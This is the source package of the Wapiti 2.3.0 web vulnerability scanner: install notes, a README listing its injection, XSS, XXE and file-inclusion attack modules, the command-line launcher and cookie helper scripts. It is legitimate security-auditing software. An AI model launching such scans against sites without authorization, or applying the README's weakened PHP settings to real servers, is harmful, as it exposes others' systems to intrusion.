wapiti-2.3.0+dfsg/INSTALL

Wapiti installation
===================

You do not have to "install" the software on your system to make it work.
If you have all the requirements on your system, just extract the tarball
and launch the "wapiti" command line in the "bin" folder:

    ./bin/wapiti (when you are in the extracted tarball)
or
    python bin/wapiti (if your system can't execute the script directly)

Installation on Unix-like systems
=================================

If you really want to install Wapiti on your system, launch the setup.py script
with the following command:

    python setup.py install

It will copy the wapiti libraries (wapitiCore) in your Python installation and
place the executables in a "bin" system directory (eg: /usr/local/bin).

Using Wapiti on Windows systems
===============================

If you don't want to install all the requirements to use Wapiti on Windows
you should look for a standalone package made with py2exe (see the available
downloads on SourceForge).
Then, just download and extract the zip archive and launch wapiti.exe from the
Windows command line.

Installing Wapiti requirements on Windows
=========================================

You can't install Wapiti on a Windows system, but if (for some reason) you
really want to install all the requirements, then:

* Download a Python 2.7.5 (or more recent) installer for your platform from
  http://python.org/download/
* Install it and change the PATH environment variable to append the Python path
* Download a requests archive from
  http://docs.python-requests.org/en/latest/user/install/
* Extract the archive and call the setup.py script from the archive with
  "python setup.py install"
* Download BeautifulSoup 3 from http://www.crummy.com/software/BeautifulSoup/
* Extract the archive and call the setup.py script from the archive with
  "python setup.py install"

wapiti-2.3.0+dfsg/MANIFEST.in

include README
include INSTALL
include TODO
include VERSION
recursive-include wapitiCore/config *
recursive-include wapitiCore/language_sources *
recursive-include wapitiCore/report_template *
recursive-include doc *

wapiti-2.3.0+dfsg/PKG-INFO

Metadata-Version: 1.1
Name: wapiti
Version: 2.3.0
Summary: A web application vulnerability scanner
Home-page: http://wapiti.sourceforge.net/
Author: Nicolas Surribas
Author-email: nicolad.surribas@gmail.com
License: GPLv2
Description: Wapiti allows you to audit the security of your web applications.
        It performs "black-box" scans, i.e. it does not study the source code of the
        application but will scan the webpages of the deployed webapp, looking for
        scripts and forms where it can inject data.
        Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see
        if a script is vulnerable.
Platform: Any
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: End Users/Desktop
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: System Administrators
Classifier: License :: OSI Approved :: GNU General Public License (GPL)
Classifier: Operating System :: MacOS :: MacOS X
Classifier: Operating System :: Microsoft :: Windows
Classifier: Operating System :: POSIX
Classifier: Operating System :: Unix
Classifier: Programming Language :: Python
Classifier: Topic :: Security
Classifier: Topic :: Internet :: WWW/HTTP :: Indexing/Search
Classifier: Topic :: Software Development :: Testing

wapiti-2.3.0+dfsg/README

                      WAPITI - VERSION 2.3.0
          Wapiti is a web application security auditor.
                 http://wapiti.sourceforge.net/
            http://www.ict-romulus.eu/web/wapiti/home

Requirements
============
In order to work correctly, Wapiti needs :
+ Python 2.x where x is >= 6 (2.6, 2.7...)
+ python-requests v1.2.3 or more ( http://docs.python-requests.org/en/latest/ )
+ BeautifulSoup ( http://www.crummy.com/software/BeautifulSoup/ )
+ python-xml

How it works
============
Wapiti works as a "black-box" vulnerability scanner, that means it won't
study the source code of web applications but will work like a fuzzer,
scanning the pages of the deployed web application, extracting links and
forms and attacking the scripts, sending payloads and looking for error
messages, special strings or abnormal behaviors.

General features
================
+ Generates vulnerability reports in various formats (HTML, XML, JSON, TXT...)
+ Can suspend and resume a scan or an attack
+ Can give you colors in the terminal to highlight vulnerabilities
+ Different levels of verbosity
+ Fast and easy way to activate/deactivate attack modules
+ Adding a payload can be as easy as adding a line to a text file

Browsing features
=================
+ Supports HTTP and HTTPS proxies
+ Authentication via several methods: Basic, Digest, Kerberos or NTLM
+ Ability to restrain the scope of the scan (domain, folder, webpage)
+ Automatic removal of a parameter in URLs
+ Safeguards against endless scan loops (max number of values for a parameter)
+ Possibility to set the first URLs to explore (even if not in scope)
+ Can exclude some URLs from the scan and attacks (e.g. the logout URL)
+ Import of cookies (get them with the wapiti-cookie and wapiti-getcookie tools)
+ Can activate / deactivate SSL certificate verification
+ Extracts URLs from Flash SWF files
+ Tries to extract URLs from JavaScript (very basic JS interpreter)
+ HTML5 aware (understands recent HTML tags)

Supported attacks
=================
+ Database Injection (PHP/ASP/JSP SQL Injections and XPath Injections)
+ Cross Site Scripting (XSS) reflected and permanent
+ File disclosure detection (local and remote include, require, fopen,
  readfile...)
+ Command Execution detection (eval(), system(), passthru()...)
+ XXE (Xml eXternal Entity) injection
+ CRLF Injection
+ Search for potentially dangerous files on the server (thanks to the Nikto db)
+ Bypass of weak htaccess configurations
+ Search for copies (backup) of scripts on the server

Wapiti supports both GET and POST HTTP methods for attacks.
It also supports multipart and can inject payloads in filenames (upload).
It displays a warning when an anomaly is found (for example 500 errors and
timeouts).
It distinguishes between permanent and reflected XSS vulnerabilities.

How to get the best results
===========================
To find more vulnerabilities (as some attacks are error-based), you can modify
your webserver configuration.

For example, you can set the following values in your PHP configuration:
safe_mode = Off
display_errors = On (recommended)
magic_quotes_gpc = Off
allow_url_fopen = On
mysql.trace_mode = On

Where to get help
=================
In the prompt, just type the following command to get the basic usage:
python wapiti.py -h
You can also take a look at the manpage.

If you find a bug, file a ticket on the bugtracker:
https://sourceforge.net/p/wapiti/bugs/

How to help the Wapiti project
==============================
You can:
+ Support the project by making a donation
  ( http://sf.net/donate/index.php?group_id=168625 )
+ Create or improve attack modules
+ Create or improve report generators
+ Work on the JS interpreter (lamejs)
+ Send bugfixes, patches...
+ Write some GUIs
+ Create some tools to convert cookies from browsers to Wapiti JSON format
+ Improve the Flash SWF parser (write a basic ABC interpreter ?)
+ Create a tool to convert PCAP files to Wapiti XML status files
+ Translate Wapiti into your language
+ Talk about Wapiti around you

What is included with Wapiti
============================
Wapiti comes with:
+ a modified version of PyNarcissus (MPL 1.1 License),
  see https://code.google.com/p/pynarcissus/
+ Kube CSS framework ( see http://imperavi.com/kube/ ) and jQuery
  for HTML report generation.

Source code structure (wapitiCore directory)
============================================
.
|-- attack                          # attack modules used for the vulnerabilities Wapiti can detect
|   |-- __init__.py
|   |-- attack.py                   # Base for all attack modules
|   |-- mod_backup.py               # This module searches for backups of scripts on the server
|   |-- mod_blindsql.py             # Time-based blind SQL scanner
|   |-- mod_crlf.py                 # Search for CR/LF injection in HTTP headers
|   |-- mod_exec.py                 # Module used to detect command execution vulnerabilities
|   |-- mod_file.py                 # Search for include()/fread() and other file handling vulns
|   |-- mod_htaccess.py             # Try to bypass weak htaccess configurations
|   |-- mod_nikto.py                # Use a Nikto database to search for potentially dangerous files
|   |-- mod_permanentxss.py         # Look for permanent XSS
|   |-- mod_sql.py                  # Standard error-based SQL injection scanner
|   `-- mod_xss.py                  # Module for XSS detection
|
|-- config
|   |-- attacks                     # Here are the text files where you can add payloads
|   |   |-- backupPayloads.txt
|   |   |-- blindSQLPayloads.txt
|   |   |-- execPayloads.txt
|   |   |-- fileHandlingPayloads.txt
|   |   `-- xssPayloads.txt
|   |
|   |-- language                    # Compiled language files (.mo)
|   |   |-- en
|   |   |   `-- LC_MESSAGES
|   |   |       `-- wapiti.mo
|   |   |-- es
|   |   |   `-- LC_MESSAGES
|   |   |       `-- wapiti.mo
|   |   |-- de
|   |   |   `-- LC_MESSAGES
|   |   |       `-- wapiti.mo
|   |   |-- fr
|   |   |   `-- LC_MESSAGES
|   |   |       `-- wapiti.mo
|   |   `-- ms
|   |       `-- LC_MESSAGES
|   |           `-- wapiti.mo
|   |
|   |-- reports
|   |   `-- generators.xml          # Database of report engines
|   |
|   `-- vulnerabilities             # Info about vulnerability types (references etc)
|       |-- anomalies.xml
|       `-- vulnerabilities.xml
|
|-- file                            # XML parsers used by Wapiti
|   |-- __init__.py
|   |-- anomalyxmlparser.py
|   |-- auxtext.py
|   |-- reportgeneratorsxmlparser.py
|   `-- vulnerabilityxmlparser.py
|
|-- language                        # Manage internationalization
|   |-- __init__.py
|   |-- vulnerability.py            # Common strings used by Wapiti
|   `-- language.py
|
|-- language_sources
|   |-- de.po
|   |-- en.po
|   |-- es.po
|   |-- file_list.txt
|   |-- fr.po
|   |-- generateSources.sh          # Script to generate .po files from source code
|   |-- generateTranslations.sh     # Script to compile .po files to .mo files
|   `-- ms.po
|
|-- net
|   |-- HTTP.py                     # Wrapper around python-requests, contains HTTP,
|   |                               # HTTPResource and HTTPResponse classes.
|   |-- __init__.py
|   |-- crawlerpersister.py         # Class used to store and load scan status
|   |-- jsoncookie.py               # Library to load and save cookies to JSON files
|   |-- jsparser
|   |   |-- __init__.py
|   |   |-- jsparser.py             # Modified version of the PyNarcissus parser
|   |   |
|   |-- lamejs.py                   # Home-made and lame JS interpreter using PyNarcissus
|   |-- lswww.py                    # HTML parsing is made here
|   `-- swf_parser.py               # Home-made Flash SWF parser, not an ABC interpreter
|
|-- report                          # Report generators
|   |-- __init__.py
|   |-- htmlreportgenerator.py      # The HTML generator is based on the JSON one
|   |-- jsonreportgenerator.py
|   |-- openvasreportgenerator.py   # Needs some more work
|   |-- reportgenerator.py          # Abstract class
|   |-- reportgeneratorinfo.py
|   |-- txtreportgenerator.py
|   |-- vulneranetxmlreportgenerator.py
|   `-- xmlreportgenerator.py
|
`-- report_template                 # Template used for HTML reports
    |-- css
    |   |-- kube.css
    |   |-- kube.min.css
    |   `-- master.css
    |-- index.html
    |-- js
    |   |-- jquery-1.9.1.min.js
    |   |-- kube.buttons.js
    |   `-- kube.tabs.js
    `-- logo_clear.png

Licensing
=========
Wapiti is released under the GNU General Public License version 2 (the GPL).
Source code is available on SourceForge:
https://sourceforge.net/projects/wapiti/

wapiti-2.3.0+dfsg/TODO

- Improve and add report generators
- Improve the JavaScript interpreter (lamejs) and make it DOM aware.
- Add some tools to convert cookies from Opera/Firefox/Chrome to Wapiti JSON format
- Add some tools to convert PCAP files to Wapiti XML scan format
- Improve the SWF parser (write a little ABC interpreter ?)
- Add a boolean-based blind SQL attack module (current module is time-based)
- Make a GUI
- More work on the "domain" scope
- lswww as a module ?

wapiti-2.3.0+dfsg/VERSION

Wapiti 2.3.0
lswww 2.3.1

wapiti-2.3.0+dfsg/bin/wapiti

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
import sys
import getopt
import os
import urlparse
import time

BASE_DIR = None
WAPITI_VERSION = "Wapiti 2.3.0"

if hasattr(sys, "frozen"):
    # For py2exe
    CONF_DIR = os.path.join(os.path.dirname(unicode(sys.executable, sys.getfilesystemencoding())), "data")
    from wapitiCore.language.language import Language
else:
    parent_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
    if os.path.exists(os.path.join(parent_dir, "wapitiCore")):
        sys.path.append(parent_dir)
    from wapitiCore.language.language import Language
    CONF_DIR = os.path.dirname(sys.modules['wapitiCore'].__file__)

lan = Language()
lan.configure()

from wapitiCore.net import HTTP, lswww
from wapitiCore.file.reportgeneratorsxmlparser import ReportGeneratorsXMLParser
from wapitiCore.file.vulnerabilityxmlparser import VulnerabilityXMLParser
from wapitiCore.file.anomalyxmlparser import AnomalyXMLParser
from wapitiCore.net.crawlerpersister import CrawlerPersister


class InvalidOptionValue(Exception):
    def __init__(self, opt_name, opt_value):
        self.opt_name = opt_name
        self.opt_value = opt_value

    def __str__(self):
        return _("Invalid argument for option {0} : {1}").format(self.opt_name, self.opt_value)


class Wapiti(object):
    """This class parses the options from the command line and sets the modules and the HTTP engine accordingly.
    Launch wapiti without arguments or with the "-h" option for more information."""

    target_url = None
    target_scope = "folder"
    urls = {}
    forms = []

    color = 0
    verbose = 0

    reportGeneratorType = "html"
    REPORT_DIR = "report"
    REPORT_FILE = "vulnerabilities"
    HOME_DIR = os.getenv('HOME') or os.getenv('USERPROFILE')
    COPY_REPORT_DIR = os.path.join(HOME_DIR, ".wapiti", "generated_report")
    outputFile = ""

    options = ""

    http_engine = None
    myls = None
    reportGen = None

    attacks = []

    def __init__(self, root_url):
        self.target_url = root_url
        server = urlparse.urlparse(root_url).netloc
        self.http_engine = HTTP.HTTP(server)
        self.myls = lswww.lswww(root_url, http_engine=self.http_engine)
        self.xmlRepGenParser = ReportGeneratorsXMLParser()
        self.xmlRepGenParser.parse(os.path.join(CONF_DIR, "config", "reports", "generators.xml"))

    def __initReport(self):
        for repGenInfo in self.xmlRepGenParser.getReportGenerators():
            if self.reportGeneratorType.lower() == repGenInfo.getKey():
                self.reportGen = repGenInfo.createInstance()
                self.reportGen.setReportInfo(target=self.target_url,
                                             scope=self.target_scope,
                                             date_string=time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()),
                                             version=WAPITI_VERSION)
                break

        vulnXMLParser = VulnerabilityXMLParser()
        vulnXMLParser.parse(os.path.join(CONF_DIR, "config", "vulnerabilities", "vulnerabilities.xml"))
        for vul in vulnXMLParser.getVulnerabilities():
            self.reportGen.addVulnerabilityType(_(vul.getName()),
                                                _(vul.getDescription()),
                                                _(vul.getSolution()),
                                                vul.getReferences())

        anomXMLParser = AnomalyXMLParser()
        anomXMLParser.parse(os.path.join(CONF_DIR, "config", "vulnerabilities", "anomalies.xml"))
        for anomaly in anomXMLParser.getAnomalies():
            self.reportGen.addAnomalyType(_(anomaly.getName()),
                                          (anomaly.getDescription()),
                                          _(anomaly.getSolution()),
                                          anomaly.getReferences())

    def __initAttacks(self):
        self.__initReport()

        from wapitiCore.attack import attack

        print(_("[*] Loading modules:"))
        print(u"\t {0}".format(u", ".join(attack.modules)))
        for mod_name in attack.modules:
            mod = __import__("wapitiCore.attack." + mod_name, fromlist=attack.modules)
            mod_instance = getattr(mod, mod_name)(self.http_engine, self.reportGen)
            if hasattr(mod_instance, "setTimeout"):
                mod_instance.setTimeout(self.http_engine.getTimeOut())
            self.attacks.append(mod_instance)

            self.attacks.sort(lambda a, b: a.PRIORITY - b.PRIORITY)

        for attack_module in self.attacks:
            attack_module.setVerbose(self.verbose)
            if self.color == 1:
                attack_module.setColor()

        if self.options != "":
            opts = self.options.split(",")

            for opt in opts:
                method = ""
                if opt.find(":") > 0:
                    module, method = opt.split(":", 1)
                else:
                    module = opt

                # deactivate some module options
                if module.startswith("-"):
                    module = module[1:]
                    if module == "all":
                        for attack_module in self.attacks:
                            if method == "get" or method == "":
                                attack_module.doGET = False
                            if method == "post" or method == "":
                                attack_module.doPOST = False
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module:
                                found = True
                                if method == "get" or method == "":
                                    attack_module.doGET = False
                                if method == "post" or method == "":
                                    attack_module.doPOST = False
                        if not found:
                            print(_("[!] Unable to find a module named {0}").format(module))

                # activate some module options
                else:
                    if module.startswith("+"):
                        module = module[1:]
                    if module == "all":
                        for attack_module in self.attacks:
                            if method == "get" or method == "":
                                attack_module.doGET = True
                            if method == "post" or method == "":
                                attack_module.doPOST = True
                    else:
                        found = False
                        for attack_module in self.attacks:
                            if attack_module.name == module:
                                found = True
                                if method == "get" or method == "":
                                    attack_module.doGET = True
                                if method == "post" or method == "":
                                    attack_module.doPOST = True
                        if not found:
                            print(_("[!] Unable to find a module named {0}").format(module))

    def browse(self, crawlerFile):
        "Extract hyperlinks and forms from the webpages found on the website"
        #self.urls, self.forms = self.myls.go(crawlerFile)
        self.myls.go(crawlerFile)
        self.urls = self.myls.getLinks()
        self.forms = self.myls.getForms()

    def attack(self):
        "Launch the attacks based on the preferences set by the command line"
        if self.urls == {} and self.forms == []:
            print(_("No links or forms found in this page !"))
            print(_("Make sure the url is correct."))
            sys.exit(1)

        self.__initAttacks()

        for x in self.attacks:
            if x.doGET is False and x.doPOST is False:
                continue
            print('')
            if x.require != []:
                t = [y.name for y in self.attacks if y.name in x.require and (y.doGET or y.doPOST)]
                if x.require != t:
                    print(_("[!] Missing dependecies for module {0}:").format(x.name))
                    print(u" {0}".format(",".join([y for y in x.require if y not in t])))
                    continue
                else:
                    x.loadRequire([y for y in self.attacks if y.name in x.require])

            x.logG(_("[+] Launching module {0}"), x.name)
            x.attack(self.urls, self.forms)

        if self.myls.getUploads() != []:
            print('')
            print(_("Upload scripts found:"))
            print("----------------------")
            for upload_form in self.myls.getUploads():
                print(upload_form)
        if not self.outputFile:
            if self.reportGeneratorType == "html":
                self.outputFile = self.COPY_REPORT_DIR
            else:
                if self.reportGeneratorType == "txt":
                    self.outputFile = self.REPORT_FILE + ".txt"
                else:
                    self.outputFile = self.REPORT_FILE + ".xml"
        self.reportGen.generateReport(self.outputFile)
        print('')
        print(_("Report"))
        print("------")
        print(_("A report has been generated in the file {0}").format(self.outputFile))
        if self.reportGeneratorType == "html":
            print(_("Open {0}/index.html with a browser to see this report.").format(self.outputFile))

    def setTimeOut(self, timeout=6.0):
        "Set the timeout for the time waiting for a HTTP response"
        self.http_engine.setTimeOut(timeout)

    def setVerifySsl(self, verify=True):
        "Set whether SSL must be verified."
        self.http_engine.setVerifySsl(verify)

    def setProxy(self, proxy=""):
        "Set a proxy to use for HTTP requests."
        self.http_engine.setProxy(proxy)

    def addStartURL(self, url):
        "Specify an URL to start the scan with. Can be called several times."
        self.myls.addStartURL(url)

    def addExcludedURL(self, url):
        "Specify an URL to exclude from the scan. Can be called several times."
        self.myls.addExcludedURL(url)

    def setCookieFile(self, cookie):
        "Load session data from a cookie file"
        self.http_engine.setCookieFile(cookie)

    def setAuthCredentials(self, auth_basic):
        "Set credentials to use if the website require an authentication."
        self.http_engine.setAuthCredentials(auth_basic)

    def setAuthMethod(self, auth_method):
        "Set the authentication method to use."
        self.http_engine.setAuthMethod(auth_method)

    def addBadParam(self, bad_param):
        """Exclude a parameter from an url (urls with this parameter will be
        modified). This function can be called several times"""
        self.myls.addBadParam(bad_param)

    def setNice(self, nice):
        """Define how many tuples of parameters / values must be sent for a
        given URL. Use it to prevent infinite loops."""
        self.myls.setNice(nice)

    def setScope(self, scope):
        """Set the scope of the crawler for the analysis of the web pages"""
        self.target_scope = scope
        self.myls.setScope(scope)

    def setColor(self):
        "Put colors in the console output (terminal must support colors)"
        self.color = 1

    def verbosity(self, vb):
        "Define the level of verbosity of the output."
        self.verbose = vb
        self.myls.verbosity(vb)

    def setModules(self, options=""):
        """Activate or deactivate (default) all attacks"""
        self.options = options

    def setReportGeneratorType(self, repGentype="xml"):
        "Set the format of the generated report. Can be xml, html or txt"
        self.reportGeneratorType = repGentype

    def setOutputFile(self, outputFile):
        "Set the filename where the report will be written"
        self.outputFile = outputFile

if __name__ == "__main__":
    doc = _("wapitiDoc")
    try:
        prox = ""
        auth = []
        crawlerPersister = CrawlerPersister()
        crawlerFile = None
        attackFile = None

        print(_("Wapiti-2.3.0 (wapiti.sourceforge.net)"))

        # Fix for bug #31
        if sys.getdefaultencoding() != "utf-8":
            reload(sys)
            sys.setdefaultencoding("utf-8")

        import requests
        if requests.__version__.startswith("0."):
            print("Error: You have an outdated version of python-requests. Please upgrade")
            sys.exit(1)

        if len(sys.argv) < 2:
            print(doc)
            sys.exit(0)

        if '-h' in sys.argv or '--help' in sys.argv:
            print(doc)
            sys.exit(0)

        if not os.path.isdir(crawlerPersister.CRAWLER_DATA_DIR):
            os.makedirs(crawlerPersister.CRAWLER_DATA_DIR)

        url = sys.argv[1]
        wap = Wapiti(url)

        try:
            opts, args = getopt.getopt(sys.argv[2:],
                                       "hup:s:x:c:a:r:v:t:m:o:f:n:kib:",
                                       ["help", "color", "proxy=", "start=", "exclude=",
                                        "cookie=", "auth=", "remove=", "verbose=", "timeout=",
                                        "module=", "output=", "format=", "nice=",
                                        "attack", "continue", "scope=", "verify-ssl=", "auth-method="])
        except getopt.GetoptError, e:
            print(e)
            sys.exit(2)

        try:
            for o, a in opts:
                if o in ["-h", "--help"]:
                    print(doc)
                    sys.exit(0)
                if o in ["-s", "--start"]:
                    if a.startswith("http://") or a.startswith("https://"):
                        wap.addStartURL(a)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-x", "--exclude"]:
                    if a.startswith("http://") or a.startswith("https://"):
                        wap.addExcludedURL(a)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-p", "--proxy"]:
                    if a.startswith("http://") or a.startswith("https://"):
                        wap.setProxy(a)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-c", "--cookie"]:
                    if os.path.isfile(a):
                        wap.setCookieFile(a)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-a", "--auth"]:
                    if a.find("%") >= 0:
                        auth = a.split("%")
                        wap.setAuthCredentials(auth)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["--auth-method"]:
                    if a in ["basic", "digest", "kerberos", "ntlm"]:
                        wap.setAuthMethod(a)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-r", "--remove"]:
                    wap.addBadParam(a)
                if o in ["-n", "--nice"]:
                    if str.isdigit(a):
                        wap.setNice(int(a))
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-u", "--color"]:
                    wap.setColor()
                if o in ["-v", "--verbose"]:
                    if str.isdigit(a):
                        wap.verbosity(int(a))
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-t", "--timeout"]:
                    if str.isdigit(a):
                        wap.setTimeOut(int(a))
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-m", "--module"]:
                    wap.setModules(a)
                if o in ["-o", "--output"]:
                    wap.setOutputFile(a)
                if o in ["-f", "--format"]:
                    found_generator = False
                    for repGenInfo in wap.xmlRepGenParser.getReportGenerators():
                        if a == repGenInfo.getKey():
                            wap.setReportGeneratorType(a)
                            found_generator = True
                            break
                    if not found_generator:
                        raise InvalidOptionValue(o, a)
                if o in ["-b", "--scope"]:
                    if a in ["page", "folder", "domain"]:
                        wap.setScope(a)
                    else:
                        raise InvalidOptionValue(o, a)
                if o in ["-k", "--attack"]:
                    if a != "" and a[0] != '-':
                        attackFile = a
                    else:
                        hostname = url.split("://")[1].split("/")[0]
                        attackFile = u"{0}{1}{2}.xml".format(crawlerPersister.CRAWLER_DATA_DIR,
                                                             os.path.sep,
                                                             hostname)
                if o in ["-i", "--continue"]:
                    if a != '' and a[0] != '-':
                        crawlerFile = a
                    else:
                        hostname = url.split("://")[1].split("/")[0]
                        crawlerFile = u"{0}{1}{2}.xml".format(crawlerPersister.CRAWLER_DATA_DIR,
                                                              os.path.sep,
                                                              hostname)
                if o in ["--verify-ssl"]:
                    if str.isdigit(a):
                        wap.setVerifySsl(bool(int(a)))
                    else:
                        raise InvalidOptionValue(o, a)
        except InvalidOptionValue, msg:
            print(msg)
            sys.exit(2)

        if attackFile is not None:
            if crawlerPersister.isDataForUrl(attackFile) == 1:
                crawlerPersister.loadXML(attackFile)
                wap.urls = crawlerPersister.getBrowsed()
                wap.forms = crawlerPersister.getForms()
                print(_("File {0} loaded. Wapiti will use it to perform the attack").format(attackFile))
            else:
                print(_("File {0} not found. Wapiti will scan the web site again").format(attackFile))
                wap.browse(crawlerFile)
        else:
            wap.browse(crawlerFile)
        try:
            wap.attack()
        except KeyboardInterrupt:
            print('')
            print(_("Attack process interrupted. To perform again the attack, "
                    "lauch Wapiti with \"-i\" or \"-k\" parameter."))
            print('')
            pass
    except SystemExit:
        pass

wapiti-2.3.0+dfsg/bin/wapiti-cookie

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2006-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
import sys
import urllib
import requests
import getopt
import urlparse
import os

if "_" not in dir():
    def _(s):
        return s

if len(sys.argv) < 3:
    sys.stderr.write("Usage python cookie.py [-p proxy_url] ...\n")
    sys.exit(1)

if not hasattr(sys, "frozen"):
    parent_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
    if os.path.exists(os.path.join(parent_dir, "wapitiCore")):
        sys.path.append(parent_dir)

from wapitiCore.net import jsoncookie

args = sys.argv[1:]
proxies = {}

try:
    opts, args = getopt.getopt(args, "p:", ["proxy="])
except getopt.GetoptError, e:
    print(e)
    sys.exit(2)

for o, a in opts:
    if o in ("-p", "--proxy"):
        parsed = urlparse.urlparse(a)
        proxies[parsed.scheme] = a

cookiefile = args[0]
url = args[1]
liste = []
if len(args) > 2:
    data = args[2:]
    for l in data:
        if "=" in l:
            # Split on the first "=" only so that values containing "=" stay intact
            liste.append(tuple(l.split("=", 1)))
        else:
            sys.stderr.write("Usage python cookie.py [-p proxy_url] ...\n")
            print("Invalid key=value for web form: {0}".format(l))
            sys.exit(1)
params = urllib.urlencode(liste)

txheaders = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}

session = requests.Session()
session.proxies = proxies

try:
    if params:
        txheaders['content-type'] = 'application/x-www-form-urlencoded'
        r = session.post(url, data=params, headers=txheaders, allow_redirects=True)
    else:
        r = session.get(url, headers=txheaders)
except IOError, e:
    print(_("Error getting url {0}").format(url))
    print(e)
    sys.exit(1)

jc = jsoncookie.jsoncookie()
jc.open(cookiefile)
jc.addcookies(session.cookies)
jc.dump()
jc.close()

wapiti-2.3.0+dfsg/bin/wapiti-getcookie

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2006-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
import urlparse
import sys
import HTMLParser
import BeautifulSoup
import getopt
import requests
import os

if "_" not in dir():
    def _(s):
        return s

if len(sys.argv) < 3:
    sys.stderr.write("Usage: python getcookie.py [options]\n\n" +
                     "Supported options are:\n" +
                     "-p \n" +
                     "--proxy \n" +
                     " To specify a proxy\n" +
                     " Example: -p http://proxy:port/\n\n")
    sys.exit(1)

TIMEOUT = 6
COOKIEFILE = sys.argv[1]
url = sys.argv[2]
proxies = {}
server = urlparse.urlparse(url).netloc

if not hasattr(sys, "frozen"):
    parent_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
    if os.path.exists(os.path.join(parent_dir, "wapitiCore")):
        sys.path.append(parent_dir)

from wapitiCore.net import jsoncookie
from wapitiCore.net import lswww

try:
    opts, args = getopt.getopt(sys.argv[3:], "p:", ["proxy="])
except getopt.GetoptError, e:
    print(e)
    sys.exit(2)

for o, a in opts:
    if o in ("-p", "--proxy"):
        parsed = urlparse.urlparse(a)
        proxies[parsed.scheme] = a

# Some websites/webapps like Webmin send a first cookie to see if the browser support them
# so we must collect these test-cookies during authentication.
jc = jsoncookie.jsoncookie()
jc.open(COOKIEFILE)
jc.delete(server)

current_full_url = url.split("#")[0]
current = current_full_url.split("?")[0]
currentdir = "/".join(current.split("/")[:-1]) + "/"
proto = url.split("://")[0]

txheaders = {'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}

session = requests.Session()
session.proxies = proxies
r = session.get(url, headers=txheaders)

resp_encoding = r.encoding
htmlSource = r.text
bs = BeautifulSoup.BeautifulSoup(htmlSource)
page_encoding = bs.originalEncoding
if page_encoding is None:
    page_encoding = resp_encoding

p = lswww.linkParser(url)
try:
    p.feed(htmlSource)
except HTMLParser.HTMLParseError, err:
    htmlSource = bs.prettify()
    try:
        p.reset()
        p.feed(htmlSource)
    except HTMLParser.HTMLParseError, err:
        p = lswww.linkParser2(url)
        p.feed(htmlSource)

jc.addcookies(session.cookies)

if len(p.forms) == 0:
    print(_("No forms found in this page !"))
    sys.exit(1)

myls = lswww.lswww(url)
i = 0
nchoice = 0
if len(p.forms) > 1:
    print(_("Choose the form you want to use :"))
    for form in p.forms:
        print('')
        print(u"{0}) {1}".format(i, myls.correctlink(form[0], current, current_full_url, currentdir, proto, page_encoding)))
        for field, value in form[1]:
            print(u"\t{0} ({1})".format(field, value))
        i += 1
    ok = False
    while not ok:
        choice = raw_input(_("Enter a number : "))
        if choice.isdigit():
            nchoice = int(choice)
            if nchoice < i and nchoice >= 0:
                ok = True

form = p.forms[nchoice]
print(_("Please enter values for the following form: "))
print(_("url = {0}").format(myls.correctlink(form[0], current, current_full_url, currentdir, proto, page_encoding)))

for i in range(len(form[1])):
    field, value = form[1][i]
    new_value = raw_input(field + " (" + value + ") : ")
    form[1][i] = [field, new_value]

url = myls.correctlink(form[0], current, current_full_url, currentdir, proto, page_encoding)

txheaders = {'User-agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
             'Content-type': 'application/x-www-form-urlencoded'}

